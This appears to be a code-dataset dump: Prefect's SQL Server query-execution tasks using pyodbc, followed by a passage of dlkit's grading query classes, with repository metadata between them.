nicolasiltis/prefect
|
4298105651c2fe02b21013ae8a0468e9e101154d
|
[
"Apache-2.0"
] | 3,903
|
2019-03-23T19:11:21.000Z
|
2022-03-31T23:21:23.000Z
|
src/prefect/tasks/sql_server/sql_server.py
|
nicolasiltis/prefect
|
4298105651c2fe02b21013ae8a0468e9e101154d
|
[
"Apache-2.0"
] | 937
|
2019-03-23T18:49:44.000Z
|
2022-03-31T21:45:13.000Z
|
import pyodbc
from prefect import Task
from prefect.utilities.tasks import defaults_from_attrs
class SqlServerExecute(Task):
"""
Task for executing a query against a SQL Server database.
Args:
- db_name (str): name of SQL Server database
- user (str): user name used to authenticate
- host (str): database host address
- port (int, optional): port used to connect to SQL Server database, defaults to 1433 if
not provided
- driver (str, optional): driver used to communicate with SQL Server database
- query (str, optional): query to execute against database
- data (tuple, optional): values to use in query, must be specified using placeholder
in query string
- commit (bool, optional): set to True to commit transaction, defaults to false
- **kwargs (dict, optional): additional keyword arguments to pass to the
Task constructor
"""
def __init__(
self,
db_name: str,
user: str,
host: str,
port: int = 1433,
driver: str = "ODBC Driver 17 for SQL Server",
query: str = None,
data: tuple = None,
commit: bool = False,
**kwargs
):
self.db_name = db_name
self.user = user
self.host = host
self.port = port
self.driver = driver
self.query = query
self.data = data
self.commit = commit
super().__init__(**kwargs)
@defaults_from_attrs("query", "data", "commit")
def run(
self,
query: str = None,
data: tuple = None,
commit: bool = False,
password: str = None,
):
"""
Task run method. Executes a query against SQL Server database.
Args:
- query (str, optional): query to execute against database
- data (tuple, optional): values to use in query, must be specified using
placeholder in query string
- commit (bool, optional): set to True to commit transaction, defaults to false
- password (str): password used to authenticate; should be provided from a `Secret` task
Returns:
- None
Raises:
- ValueError: if query parameter is None or a blank string
- DatabaseError: if exception occurs when executing the query
"""
if not query:
raise ValueError("A query string must be provided")
# connect to database
cnxn = pyodbc.connect(
driver=self.driver,
host=self.host,
database=self.db_name,
port=self.port,
user=self.user,
password=password,
)
# try to execute query
# context manager automatically rolls back failed transactions
try:
with cnxn.cursor() as cursor:
executed = cursor.execute(query, data)
if commit:
cnxn.commit()
else:
cnxn.rollback()
return executed
# ensure connection is closed
finally:
cnxn.close()
class SqlServerExecuteMany(Task):
"""
Task for executing many queries against a SQL Server database.
Args:
- db_name (str): name of SQL Server database
- user (str): user name used to authenticate
- host (str): database host address
- port (int, optional): port used to connect to SQL Server database, defaults to 1433 if
not provided
- driver (str, optional): driver used to communicate with SQL Server database
- query (str, optional): query to execute against database
- data (tuple, optional): values to use in query, must be specified using placeholder
in query string
- commit (bool, optional): set to True to commit transaction, defaults to false
- **kwargs (dict, optional): additional keyword arguments to pass to the
Task constructor
"""
def __init__(
self,
db_name: str,
user: str,
host: str,
port: int = 1433,
driver: str = "ODBC Driver 17 for SQL Server",
query: str = None,
data: tuple = None,
commit: bool = False,
**kwargs
):
self.db_name = db_name
self.user = user
self.host = host
self.port = port
self.driver = driver
self.query = query
self.data = data
self.commit = commit
super().__init__(**kwargs)
@defaults_from_attrs("query", "data", "commit")
def run(
self,
query: str = None,
data: list = None,
commit: bool = False,
password: str = None,
fast_executemany=False,
):
"""
Task run method. Executes many queries against SQL Server database.
Args:
- query (str, optional): query to execute against database
- data (List[tuple], optional): list of values to use in query, must be specified using
placeholder
- commit (bool, optional): set to True to commit transaction, defaults to false
- password (str): password used to authenticate; should be provided from a `Secret` task
- fast_executemany (bool, optional): sends all params to the DB server in one bundle with
the SQL statement. DB executes the SQL against all the params as one DB transaction
Returns:
- None
Raises:
- ValueError: if query parameter is None or a blank string
- DatabaseError: if exception occurs when executing the query
"""
if not query:
raise ValueError("A query string must be provided")
if not data:
raise ValueError("A data list must be provided")
# connect to database
cnxn = pyodbc.connect(
driver=self.driver,
host=self.host,
database=self.db_name,
port=self.port,
user=self.user,
password=password,
)
# try to execute query
# context manager automatically rolls back failed transactions
try:
with cnxn.cursor() as cursor:
if fast_executemany:
cursor.fast_executemany = True
executed = cursor.executemany(query, data)
if commit:
cnxn.commit()
else:
cnxn.rollback()
return executed
# ensure connection is closed
finally:
cnxn.close()
class SqlServerFetch(Task):
"""
Task for fetching results of query from SQL Server database.
Args:
- db_name (str): name of SQL Server database
- user (str): user name used to authenticate
- host (str): database host address
- port (int, optional): port used to connect to SQL Server database, defaults to 5432 if
not provided
- driver (str, optional): driver used to communicate with SQL Server database
- fetch (str, optional): one of "one" "many" or "all", used to determine how many
results to fetch from executed query
- fetch_count (int, optional): if fetch = 'many', determines the number of results
to fetch, defaults to 10
- query (str, optional): query to execute against database
- data (tuple, optional): values to use in query, must be specified using placeholder
in query string
- commit (bool, optional): set to True to commit transaction, defaults to false
- **kwargs (dict, optional): additional keyword arguments to pass to the
Task constructor
"""
def __init__(
self,
db_name: str,
user: str,
host: str,
port: int = 1433,
driver: str = "ODBC Driver 17 for SQL Server",
fetch: str = "one",
fetch_count: int = 10,
query: str = None,
data: tuple = None,
commit: bool = False,
**kwargs
):
self.db_name = db_name
self.user = user
self.host = host
self.port = port
self.fetch = fetch
self.fetch_count = fetch_count
self.driver = driver
self.query = query
self.data = data
self.commit = commit
super().__init__(**kwargs)
@defaults_from_attrs("fetch", "fetch_count", "query", "data", "commit")
def run(
self,
fetch: str = "one",
fetch_count: int = 10,
query: str = None,
data: tuple = None,
commit: bool = False,
password: str = None,
):
"""
Task run method. Executes a query against SQL Server database and fetches results.
Args:
- fetch (str, optional): one of "one" "many" or "all", used to determine how many
results to fetch from executed query
- fetch_count (int, optional): if fetch = 'many', determines the number of results
to fetch, defaults to 10
- query (str, optional): query to execute against database
- data (tuple, optional): values to use in query, must be specified using
placeholder in query string
- commit (bool, optional): set to True to commit transaction, defaults to false
- password (str): password used to authenticate; should be provided from a `Secret` task
Returns:
- records (tuple or list of tuples): records from provided query
Raises:
- ValueError: if query parameter is None or a blank string
- DatabaseError: if exception occurs when executing the query
"""
if not query:
raise ValueError("A query string must be provided")
if fetch not in {"one", "many", "all"}:
raise ValueError(
"The 'fetch' parameter must be one of the following - ('one', 'many', 'all')"
)
# connect to database
cnxn = pyodbc.connect(
driver=self.driver,
host=self.host,
database=self.db_name,
port=self.port,
user=self.user,
password=password,
)
# try to execute query
# context manager automatically rolls back failed transactions
try:
with cnxn.cursor() as crsr:
if data:
crsr.execute(query, data)
else:
crsr.execute(query)
# fetch results
if fetch == "all":
records = crsr.fetchall()
elif fetch == "many":
records = crsr.fetchmany(fetch_count)
else:
records = crsr.fetchone()
if commit:
cnxn.commit()
return records
# ensure connection is closed
finally:
cnxn.close()
| 33.454819
| 101
| 0.561088
| 1,254
| 11,107
| 4.922648
| 0.11563
| 0.026243
| 0.041309
| 0.020411
| 0.84416
| 0.84416
| 0.84011
| 0.828122
| 0.828122
| 0.828122
| 0
| 0.005379
| 0.364005
| 11,107
| 331
| 102
| 33.555891
| 0.868488
| 0.470334
| 0
| 0.805714
| 0
| 0.005714
| 0.069613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034286
| false
| 0.034286
| 0.017143
| 0
| 0.085714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df6dd1c41c7b84e6eb7c618dce2d2c2c03281981
| 88,867
|
py
|
Python
|
dlkit/json_/grading/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/json_/grading/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/json_/grading/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""JSON implementations of grading queries."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods,too-few-public-methods
# Number of methods are defined in specification
# pylint: disable=protected-access
# Access to protected methods allowed in package json package scope
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from .. import utilities
from ..id.objects import IdList
from ..osid import queries as osid_queries
from ..primitives import Id
from ..utilities import get_registry
from dlkit.abstract_osid.grading import queries as abc_grading_queries
from dlkit.abstract_osid.osid import errors
class GradeQuery(abc_grading_queries.GradeQuery, osid_queries.OsidObjectQuery, osid_queries.OsidSubjugateableQuery):
"""This is the query for searching gradings.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.Grade'
self._runtime = runtime
record_type_data_sets = get_registry('GRADE_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_grade_system_id(self, grade_system_id, match):
"""Sets the grade system ``Id`` for this query.
arg: grade_system_id (osid.id.Id): a grade system ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``grade_system_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeSystemId', str(grade_system_id), match)
def clear_grade_system_id_terms(self):
"""Clears the grade system ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeSystemId')
grade_system_id_terms = property(fdel=clear_grade_system_id_terms)
def supports_grade_system_query(self):
"""Tests if a ``GradeSystemQuery`` is available for querying grade systems.
return: (boolean) - ``true`` if a grade system query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_system_query(self):
"""Gets the query for a grade system.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeSystemQuery) - the grade system query
raise: Unimplemented - ``supports_grade_system_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_system_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_system_query = property(fget=get_grade_system_query)
def clear_grade_system_terms(self):
"""Clears the grade system terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradeSystem')
grade_system_terms = property(fdel=clear_grade_system_terms)
@utilities.arguments_not_none
def match_input_score_start_range(self, start, end, match):
"""Matches grades with the start input score inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``start`` is greater than ``end``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_input_score_start_range_terms(self):
"""Clears the nput score start range terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('inputScoreStartRange')
input_score_start_range_terms = property(fdel=clear_input_score_start_range_terms)
@utilities.arguments_not_none
def match_input_score_end_range(self, start, end, match):
"""Matches grades with the end input score inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``start`` is greater than ``end``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_input_score_end_range_terms(self):
"""Clears the nput score start range terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('inputScoreEndRange')
input_score_end_range_terms = property(fdel=clear_input_score_end_range_terms)
@utilities.arguments_not_none
def match_input_score(self, start, end, match):
"""Matches grades with the input score range contained within the given range inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``start`` is greater than ``end``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_input_score_terms(self):
"""Clears the input score start range terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
input_score_terms = property(fdel=clear_input_score_terms)
@utilities.arguments_not_none
def match_output_score(self, start, end, match):
"""Matches grades with the output score contained within the given range inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``start`` is greater than ``end``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_output_score_terms(self):
"""Clears the output score terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('outputScore')
output_score_terms = property(fdel=clear_output_score_terms)
@utilities.arguments_not_none
def match_grade_entry_id(self, grade_entry_id, match):
"""Sets the grade entry ``Id`` for this query.
arg: grade_entry_id (osid.id.Id): a grade entry ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``grade_entry_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeEntryId', str(grade_entry_id), match)
def clear_grade_entry_id_terms(self):
"""Clears the grade entry ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeEntryId')
grade_entry_id_terms = property(fdel=clear_grade_entry_id_terms)
def supports_grade_entry_query(self):
"""Tests if a ``GradeEntryQuery`` is available for querying grade entries.
return: (boolean) - ``true`` if a grade entry query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_entry_query(self):
"""Gets the query for a grade entry.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeEntryQuery) - the grade entry query
raise: Unimplemented - ``supports_grade_entry_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_entry_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_entry_query = property(fget=get_grade_entry_query)
@utilities.arguments_not_none
def match_any_grade_entry(self, match):
"""Matches grades that are assigned to any grade entry.
arg: match (boolean): ``true`` to match grades used in any
grade entry, ``false`` to match grades that are not used
in any grade entries
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_entry_terms(self):
"""Clears the grade entry terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grade_entry_terms = property(fdel=clear_grade_entry_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedGradebookIds', str(gradebook_id), match)
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedGradebookIds')
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebook')
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_grade_query_record(self, grade_record_type):
"""Gets the grade query record corresponding to the given ``Grade`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: grade_record_type (osid.type.Type): a grade record type
return: (osid.grading.records.GradeQueryRecord) - the grade
query record
raise: NullArgument - ``grade_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported - ``has_record_type(grade_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradeSystemQuery(abc_grading_queries.GradeSystemQuery, osid_queries.OsidObjectQuery, osid_queries.OsidAggregateableQuery):
"""This is the query for searching grade systems.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.GradeSystem'
self._runtime = runtime
record_type_data_sets = get_registry('GRADE_SYSTEM_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_based_on_grades(self, match):
"""Matches grade systems based on grades.
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_based_on_grades_terms(self):
"""Clears the grade ``based`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('basedOnGrades')
based_on_grades_terms = property(fdel=clear_based_on_grades_terms)
@utilities.arguments_not_none
def match_grade_id(self, grade_id, match):
"""Sets the grade ``Id`` for this query.
arg: grade_id (osid.id.Id): a grade ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeId', str(grade_id), match)
def clear_grade_id_terms(self):
"""Clears the grade ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeId')
grade_id_terms = property(fdel=clear_grade_id_terms)
def supports_grade_query(self):
"""Tests if a ``GradeQuery`` is available for querying grades.
return: (boolean) - ``true`` if a grade query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_query(self):
"""Gets the query for a grade.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeQuery) - the grade query
raise: Unimplemented - ``supports_grade_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_grade_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_query = property(fget=get_grade_query)
@utilities.arguments_not_none
def match_any_grade(self, match):
"""Matches grade systems with any grade.
arg: match (boolean): ``true`` to match grade systems with
any grade, ``false`` to match systems with no grade
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_terms(self):
"""Clears the grade terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grade_terms = property(fdel=clear_grade_terms)
@utilities.arguments_not_none
def match_lowest_numeric_score(self, start, end, match):
"""Matches grade systems whose low end score falls in the specified range inclusive.
arg: start (decimal): low end of range
arg: end (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``end`` is less than ``start``
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_lowest_numeric_score_terms(self):
"""Clears the lowest numeric score terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('lowestNumericScore')
lowest_numeric_score_terms = property(fdel=clear_lowest_numeric_score_terms)
@utilities.arguments_not_none
def match_numeric_score_increment(self, start, end, match):
"""Matches grade systems numeric score increment is between the specified range inclusive.
arg: start (decimal): low end of range
arg: end (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``end`` is less than ``start``
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_numeric_score_increment_terms(self):
"""Clears the numeric score increment terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('numericScoreIncrement')
numeric_score_increment_terms = property(fdel=clear_numeric_score_increment_terms)
@utilities.arguments_not_none
def match_highest_numeric_score(self, start, end, match):
"""Matches grade systems whose high end score falls in the specified range inclusive.
arg: start (decimal): low end of range
arg: end (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``end`` is less than ``start``
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_highest_numeric_score_terms(self):
"""Clears the highest numeric score terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('highestNumericScore')
highest_numeric_score_terms = property(fdel=clear_highest_numeric_score_terms)
@utilities.arguments_not_none
def match_gradebook_column_id(self, gradebook_column_id, match):
"""Sets the gradebook column ``Id`` for this query.
arg: gradebook_column_id (osid.id.Id): a gradebook column
``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``gradebook_column_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradebookColumnId', str(gradebook_column_id), match)
def clear_gradebook_column_id_terms(self):
"""Clears the gradebook column ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradebookColumnId')
gradebook_column_id_terms = property(fdel=clear_gradebook_column_id_terms)
def supports_gradebook_column_query(self):
"""Tests if a ``GradebookColumnQuery`` is available.
return: (boolean) - ``true`` if a gradebook column query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_query(self):
"""Gets the query for a gradebook column.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnQuery) - the gradebook
column query
raise: Unimplemented - ``supports_gradebook_column_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_query = property(fget=get_gradebook_column_query)
@utilities.arguments_not_none
def match_any_gradebook_column(self, match):
"""Matches grade systems assigned to any gradebook column.
arg: match (boolean): ``true`` to match grade systems mapped
to any column, ``false`` to match systems mapped to no
columns
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_terms(self):
"""Clears the gradebook column terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_column_terms = property(fdel=clear_gradebook_column_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedGradebookIds', str(gradebook_id), match)
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedGradebookIds')
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebook')
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_grade_system_query_record(self, grade_system_record_type):
"""Gets the grade system query record corresponding to the given ``GradeSystem`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: grade_system_record_type (osid.type.Type): a grade
system record type
return: (osid.grading.records.GradeSystemQueryRecord) - the
grade system query record
raise: NullArgument - ``grade_system_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(grade_system_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradeEntryQuery(abc_grading_queries.GradeEntryQuery, osid_queries.OsidRelationshipQuery):
"""This is the query for searching grade entries.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.GradeEntry'
self._runtime = runtime
record_type_data_sets = get_registry('GRADE_ENTRY_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_gradebook_column_id(self, gradebook_column_id, match):
"""Sets the gradebook column ``Id`` for this query.
arg: gradebook_column_id (osid.id.Id): a gradebook column
``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_column_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
self._add_match('gradebookColumnId',
str(gradebook_column_id),
match)
def clear_gradebook_column_id_terms(self):
"""Clears the gradebook column ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradebookColumnId')
gradebook_column_id_terms = property(fdel=clear_gradebook_column_id_terms)
def supports_gradebook_column_query(self):
"""Tests if a ``GradebookColumnQuery`` is available for querying creators.
return: (boolean) - ``true`` if a gradebook column query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_query(self):
"""Gets the query for a gradebook column.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnQuery) - the gradebook
column query
raise: Unimplemented - ``supports_gradebook_column_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_query = property(fget=get_gradebook_column_query)
def clear_gradebook_column_terms(self):
"""Clears the gradebook column terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebookColumn')
gradebook_column_terms = property(fdel=clear_gradebook_column_terms)
@utilities.arguments_not_none
def match_key_resource_id(self, resource_id, match):
"""Sets the key resource ``Id`` for this query.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``resource_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('keyResourceId', str(resource_id), match)
def clear_key_resource_id_terms(self):
"""Clears the key resource ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('keyResourceId')
key_resource_id_terms = property(fdel=clear_key_resource_id_terms)
def supports_key_resource_query(self):
"""Tests if a ``ResourceQUery`` is available for querying key resources.
return: (boolean) - ``true`` if a resource query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_key_resource_query(self):
"""Gets the query for a key resource.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.resource.ResourceQuery) - the resource query
raise: Unimplemented - ``supports_key_resource_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_key_resource_query()`` is ``true``.*
"""
raise errors.Unimplemented()
key_resource_query = property(fget=get_key_resource_query)
@utilities.arguments_not_none
def match_any_key_resource(self, match):
"""Matches grade entries with any key resource.
arg: match (boolean): ``true`` to match grade entries with
any key resource, ``false`` to match entries with no key
resource
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_key_resource_terms(self):
"""Clears the key resource terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
key_resource_terms = property(fdel=clear_key_resource_terms)
@utilities.arguments_not_none
def match_derived(self, match):
"""Matches derived grade entries.
arg: match (boolean): ``true`` to match derived grade entries
, ``false`` to match manual entries
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_derived_terms(self):
"""Clears the derived terms.
